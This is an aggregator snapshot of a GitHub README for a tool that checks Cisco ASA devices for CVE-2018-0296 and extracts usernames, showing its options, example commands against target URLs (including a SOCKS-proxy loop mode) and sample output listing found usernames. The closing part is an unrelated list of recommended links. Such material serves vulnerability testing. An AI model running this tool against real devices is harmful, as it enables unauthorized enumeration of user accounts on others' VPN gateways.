

GitHub - milo2012/CVE-2018-0296: Test CVE-2018-0296 and extract usernames
source link: https://github.com/milo2012/CVE-2018-0296
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

README.md
CVE-2018-0296
Test CVE-2018-0296 and extract usernames from Cisco ASA.
Refer to https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/ for more technical details.
#Help Menu
$ ./CVE-2018-0296 -h
Options:
-h, --help display help information
-u, --url Url of target device
-i IP of Socks Proxy
-p Port of Socks Proxy
-t, --time Number of seconds to sleep between loop
--loop Loop mode
#Usage Guide
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1
$ ./CVE-2018-0296 -u https://www.yahoo.com:443
[*] Checking: https://www.yahoo.com
[+] https://www.yahoo.com [NOT Cisco VPN]
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x
[+] https://x.x.x.x [Cisco VPN]
[+] https://x.x.x.x [Vulnerable]
[*] No usernames found
$ ./CVE-2018-0296 -i 127.0.0.1 -p 10000 --loop 10 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1
Recommend
-
62
README.md RidRelay Quick and easy way to get domain usernames while on an internal network. Hit me up: @skorov8 How it works Rid...
-
36
README.md The-Big-Username-Blacklist This is a opinionated blacklist of words that you might not like to see used as usernames in your service (think
-
52
README.md Sherlock Find usernames across over 75 social networks
-
44
README.md Sherlock Find usernames across social networks
-
68
README.md
-
47
Docker disclosed one of their Hub databases was hacked and a subset of non-financial data, including usernames, hashed passwords, and GitHu...
-
51
README.md CVE-2018-13379 CVE-2018-13379 ht...
-
18
In 2006, Robert Andersen sent the first tweet that @mentioned another user , and an internet convention was born.
-
4
【译】SE-0296 Async/await 发表于 2021-03-06 更新于 2021-03-10 本文字数: 20k原文链接:SE-0296 async/await
-
8
Twitch policy update bans sex and hard drugs from usernames Twitch has updated its usernames policy Illustration by Alex Castro / The Verge
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK